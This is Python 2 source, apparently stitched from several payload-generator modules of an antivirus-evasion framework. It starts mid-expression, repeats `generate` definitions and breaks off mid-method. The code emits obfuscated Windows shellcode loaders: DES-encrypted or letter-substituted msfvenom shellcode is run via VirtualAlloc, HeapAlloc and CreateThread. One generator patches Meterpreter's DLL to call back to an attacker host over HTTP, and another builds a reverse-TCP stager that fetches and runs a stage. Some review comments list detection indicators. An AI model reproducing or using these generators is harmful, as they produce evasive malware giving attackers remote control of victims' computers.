                    + "),avlol.c_int(0x00000008),avlol.c_int(len( "
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandBuf
                    + " = (avlol.c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                )
                PayloadCode += (
                    "\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandHt
                    + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
                    + RandPtr
                    + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
                )
                PayloadCode += (
                    "\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
                )

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            # Any inject_method other than "virtual"/"heap": no Win32 allocation calls,
            # the decrypted bytes are cast straight to a function pointer and called.
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                # NOTE(review): RandPtr, RandBuf, RandHt and RandReverseShell are
                # assigned but never referenced in this branch.
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "from ctypes import *\n"
                # key and IV are embedded in the clear -- see the docstring
                PayloadCode += RandIV + " = '" + iv + "'\n"
                PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                # unlike the other branches this keeps a str, not a bytearray, because
                # create_string_buffer below takes a str initializer
                PayloadCode += (
                    ShellcodeVariableName
                    + " = "
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape')\n"
                )
                PayloadCode += (
                    RandMemoryShell
                    + " = create_string_buffer("
                    + ShellcodeVariableName
                    + ", len("
                    + ShellcodeVariableName
                    + "))\n"
                )
                PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
                PayloadCode += RandShellcode + "()"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                # (see the "virtual" expiry branch for the date-format and clock caveats)
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                # NOTE(review): RandPtr, RandBuf, RandHt and RandReverseShell are
                # assigned but never referenced in this branch.
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "from ctypes import *\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " = datetime.now()\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                # key and IV are embedded in the clear -- see the docstring
                PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
                PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    "\t"
                    + ShellcodeVariableName
                    + " = "
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape')\n"
                )
                PayloadCode += (
                    "\t"
                    + RandMemoryShell
                    + " = create_string_buffer("
                    + ShellcodeVariableName
                    + ", len("
                    + ShellcodeVariableName
                    + "))\n"
                )
                PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
                PayloadCode += "\t" + RandShellcode + "()"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
    def generate(self):
        """Patch Metasploit's stock metsrv.x86.dll for a reverse-HTTP handler and wrap it in a Python 2 loader.

        The DLL is read from a fixed path under ``settings.METASPLOIT_PATH``.
        If that path does not exist the method prints three error lines and
        calls ``sys.exit()`` -- it terminates the whole process rather than
        returning.  It then overwrites, in place and without changing the
        image length (``dllReplace`` replaces exactly ``len(s)`` bytes):

        * the start of the image, with whatever ``helpers.selfcontained_patch()``
          returns;
        * the ``METERPRETER_UA\\x00`` marker, with a fixed MSIE 6.1 user agent;
        * the ``METERPRETER_TRANSPORT_SSL`` marker, selecting plaintext HTTP;
        * the ``https://`` + 256 ``X`` URL placeholder, with
          ``http://LHOST:LPORT/<checksum>_<16 random chars>/``;
        * two 32-bit marker words, with the session-expiry (604800) and
          communication (300) timeouts.

        Every ``.index()`` lookup raises ``ValueError`` if its marker is not
        present (e.g. a different metsrv build); nothing here catches that.

        The patched image is passed through ``helpers.deflate`` and embedded in
        the emitted source as a string literal that the emitted inflate helper
        base64-decodes and raw-inflates (``zlib.decompress(..., -15)``).
        ``inject_method`` ``"void"`` emits a ``ctypes`` cast-and-call loader;
        any other value emits the VirtualAlloc/RtlMoveMemory/CreateThread
        sequence.  ``use_pyherion`` ``"y"`` wraps the result with
        ``encryption.pyherion``.

        Network-facing indicators fixed by this method: the transport is
        plaintext HTTP, the user agent string is constant, and the first
        request path has the ``/<checksum>_<random>/`` shape above.

        Returns:
            str: the generated loader source.
        """

        # hard-coded to one gem version; any other Metasploit layout takes the exit branch
        if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
        else:
            print "[*] Error: You either do not have the latest version of Metasploit or"
            print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
            print "[*] Error: Please fix either issue then select this payload again!"
            sys.exit()

        # NOTE(review): no with-block, so the handle leaks if read() raises
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()

        # lambda function used for patching the metsvc.dll
        # overwrite len(s) bytes at offset ind; the total length is unchanged
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        # presumably this makes the image runnable from offset 0 (the "void"
        # branch below calls the raw bytes directly) -- cannot confirm from here
        headerPatch = helpers.selfcontained_patch()
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        # detection: this UA is constant across every sample this method produces
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        # the replacement is one byte longer than the marker (trailing NUL), so it
        # also overwrites the byte that followed the marker in the original image
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        # plaintext http://, so the callback is observable on the wire;
        # genHTTPChecksum is defined elsewhere on this class
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)

        # replace the expiration timeout with 604800 (7 days in seconds)
        # 0xb64be661 is presumably the placeholder word the stock DLL ships with --
        # verify against the metsrv source for the pinned gem version
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        # (0xaf79257f: same placeholder caveat as above)
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        # the emitted decoder expects base64 of a raw deflate stream -- assumed to
        # be what helpers.deflate produces
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            # fresh names: the previous randVarName is the local inside the emitted helper
            randVarName = helpers.randomString()
            randFuncName = helpers.randomString()

            # the inflated image is cast straight to a function pointer and called
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()
            randPtr = helpers.randomString()
            randBuf = helpers.randomString()
            randHt = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            # NOTE(review): unlike the "void" branch, randVarName is reused here, so
            # the module-level variable shares its name with the helper's local
            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            # -1 == INFINITE
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'


        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
    def generate(self):
        #Random letter substition variables
        hex_letters = "abcdef"
        non_hex_letters = "ghijklmnopqrstuvwxyz"
        encode_with_this = random.choice(hex_letters)
        decode_with_this = random.choice(non_hex_letters)

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate(self.required_options)

        # Generate Random Variable Names
        subbed_shellcode_variable_name = helpers.randomString()
        shellcode_variable_name = helpers.randomString()
        rand_ptr = helpers.randomString()
        rand_buf = helpers.randomString()
        rand_ht = helpers.randomString()
        rand_decoded_letter = helpers.randomString()
        rand_correct_letter = helpers.randomString()
        rand_sub_scheme = helpers.randomString()

        # Create Letter Substitution Scheme
        sub_scheme = string.maketrans(encode_with_this, decode_with_this)

        # Escaping Shellcode
        Shellcode = Shellcode.encode("string_escape")

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Create Payload File
                payload_code = 'import ctypes as avlol\n'
                payload_code += 'from string import maketrans\n'
                payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
                payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
                payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                payload_code += rand_ptr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + shellcode_variable_name + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                payload_code += rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
                payload_code += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
                payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Extra Variables
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Create Payload File
                payload_code = 'import ctypes as avlol\n'
                payload_code += 'from string import maketrans\n'
                payload_code += 'from datetime import datetime\n'
                payload_code += 'from datetime import date\n\n'
                payload_code += RandToday + ' = datetime.now()\n'
                payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                payload_code += '\t' + rand_ptr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + shellcode_variable_name + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                payload_code += '\t' + rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
                payload_code += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
                payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code

        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                HeapVar = helpers.randomString()

                # Create Payload File
                payload_code = 'import ctypes as avlol\n'
                payload_code += 'from string import maketrans\n'
                payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
                payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
                payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                payload_code += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + shellcode_variable_name + ') * 2),avlol.c_int(0))\n'
                payload_code += rand_ptr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + shellcode_variable_name + ')))\n'
                payload_code += rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
                payload_code += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
                payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Extra Variables
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                HeapVar = helpers.randomString()

                # Create Payload File
                payload_code = 'import ctypes as avlol\n'
                payload_code += 'from string import maketrans\n'
                payload_code += 'from datetime import datetime\n'
                payload_code += 'from datetime import date\n\n'
                payload_code += RandToday + ' = datetime.now()\n'
                payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                payload_code += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + shellcode_variable_name + ') * 2),avlol.c_int(0))\n'
                payload_code += '\t' + rand_ptr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + shellcode_variable_name + ')))\n'
                payload_code += '\t' + rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
                payload_code += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
                payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code

        else:
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                #Additional random variable names
                rand_reverse_shell = helpers.randomString()
                rand_memory_shell = helpers.randomString()
                rand_shellcode = helpers.randomString()

                # Create Payload File
                payload_code = 'from ctypes import *\n'
                payload_code += 'from string import maketrans\n'
                payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
                payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
                payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
                payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
                payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
                payload_code += rand_shellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Extra Variables
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                #Additional random variable names
                rand_reverse_shell = helpers.randomString()
                rand_memory_shell = helpers.randomString()
                rand_shellcode = helpers.randomString()

                # Create Payload File
                payload_code = 'from ctypes import *\n'
                payload_code += 'from string import maketrans\n'
                payload_code += 'from datetime import datetime\n'
                payload_code += 'from datetime import date\n\n'
                payload_code += RandToday + ' = datetime.now()\n'
                payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
                payload_code += '\t' + rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
                payload_code += '\t' + rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
                payload_code += '\t' + rand_shellcode + '()'


                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code
    def generate(self) -> str:
        """Build the Python source for a reverse-TCP meterpreter stager.

        The emitted program targets Python 2 (it uses ``xrange`` and treats
        socket data as ``str``). At run time it connects to ``LHOST``:``LPORT``,
        reads a 4-byte little-endian length, receives that many bytes of stage
        (.dll) data, prepends ``0xBF`` + the packed socket fd (x86
        ``mov edi, imm32``) and executes the buffer in a new thread via
        VirtualAlloc/VirtualLock/RtlMoveMemory/CreateThread/WaitForSingleObject.

        Options read from ``self.required_options`` (``[0]`` holds the value):
        ``LHOST``, ``LPORT``, ``expire_payload`` (``"x"`` = no expiry, otherwise
        a number of days) and ``use_pyherion`` (``"y"`` wraps the result with
        ``encryption.pyherion``).

        ``helpers``, ``encryption``, ``date`` and ``timedelta`` are module-level
        names imported elsewhere in this file (not visible here).

        Returns:
            The generated source as a ``str`` (``encryption.pyherion`` output is
            presumed to be a ``str`` as well).

        Raises:
            KeyError: when one of the option keys above is missing.
            ValueError: when ``expire_payload`` is neither ``"x"`` nor an
                integer string (``int()`` in the expiry branch).
        """

        # randomize all of the variable names used in the emitted source.
        # helpers.randomString() is a project helper; its output is assumed to
        # be a valid Python identifier -- nothing here checks that.
        shellCodeName = helpers.randomString()
        socketName = helpers.randomString()
        intervalName = helpers.randomString()   # generated but never referenced below
        attemptsName = helpers.randomString()   # generated but never referenced below
        getDataMethodName = helpers.randomString()
        fdBufName = helpers.randomString()
        rcvStringName = helpers.randomString()
        rcvCStringName = helpers.randomString()

        injectMethodName = helpers.randomString()
        tempShellcodeName = helpers.randomString()
        shellcodeBufName = helpers.randomString()
        fpName = helpers.randomString()
        tempCBuffer = helpers.randomString()

        # NOTE(review): `random` and `time` are imported by the emitted code
        # but nothing emitted below uses them (likewise intervalName /
        # attemptsName above) -- looks like a retry loop that was never
        # finished; harmless, but an extra static indicator.
        payloadCode = "import struct, socket, binascii, ctypes, random, time\n"

        # socket and shellcode variables that need to be kept global
        payloadCode += "%s, %s = None, None\n" % (shellCodeName, socketName)

        # build the method that creates a socket, connects to the handler,
        # and downloads/patches the meterpreter .dll
        payloadCode += "def %s():\n" % (getDataMethodName)
        payloadCode += "\ttry:\n"
        payloadCode += "\t\tglobal %s\n" % (socketName)
        # build the socket and connect to the handler (plain TCP, no TLS)
        payloadCode += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % (
            socketName)
        # LHOST/LPORT are interpolated verbatim into a string/int literal;
        # no validation of either value happens here.
        payloadCode += "\t\t%s.connect(('%s', %s))\n" % (
            socketName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        # pack the underlying socket file descriptor into a c structure
        # ('<i' = little-endian signed 32-bit, i.e. the 4 immediate bytes of
        # the mov edi instruction built further down)
        payloadCode += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (
            fdBufName, socketName)
        # unpack the length of the payload, received as a 4 byte array from the handler.
        # A single recv(4) is assumed to return all 4 bytes; a short read makes
        # struct.unpack raise, which the bare except below turns into None.
        payloadCode += "\t\tl = struct.unpack('<i', str(%s.recv(4)))[0]\n" % (
            socketName)
        # 5-byte placeholder that is overwritten with 0xBF + fd after the
        # stage has been received
        payloadCode += "\t\t%s = \"     \"\n" % (rcvStringName)
        # receive ALL of the payload .dll data.
        # NOTE(review): the length check counts the 5 placeholder bytes, so
        # the loop may stop up to 5 bytes short of the advertised stage
        # length; and a recv() returning '' (peer closed) never grows the
        # buffer, so the loop would spin forever -- verify against the
        # handler's framing before relying on this.
        payloadCode += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (
            rcvStringName, rcvStringName, socketName)
        payloadCode += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (
            rcvCStringName, rcvStringName, rcvStringName)
        # prepend a little assembly magic to push the socket fd into the edi register
        # (opcode 0xBF = mov edi, imm32 on x86)
        payloadCode += "\t\t%s[0] = binascii.unhexlify('BF')\n" % (
            rcvCStringName)
        # copy the socket fd in as the 4-byte immediate
        payloadCode += "\t\tfor i in xrange(4): %s[i+1] = %s[i]\n" % (
            rcvCStringName, fdBufName)
        payloadCode += "\t\treturn %s\n" % (rcvCStringName)
        # bare except: any failure (connect refused, short read, ...) yields
        # None and the injector below silently does nothing
        payloadCode += "\texcept: return None\n"

        # build the method that injects the .dll into memory
        payloadCode += "def %s(%s):\n" % (injectMethodName, tempShellcodeName)
        # skip injection entirely when the download above failed
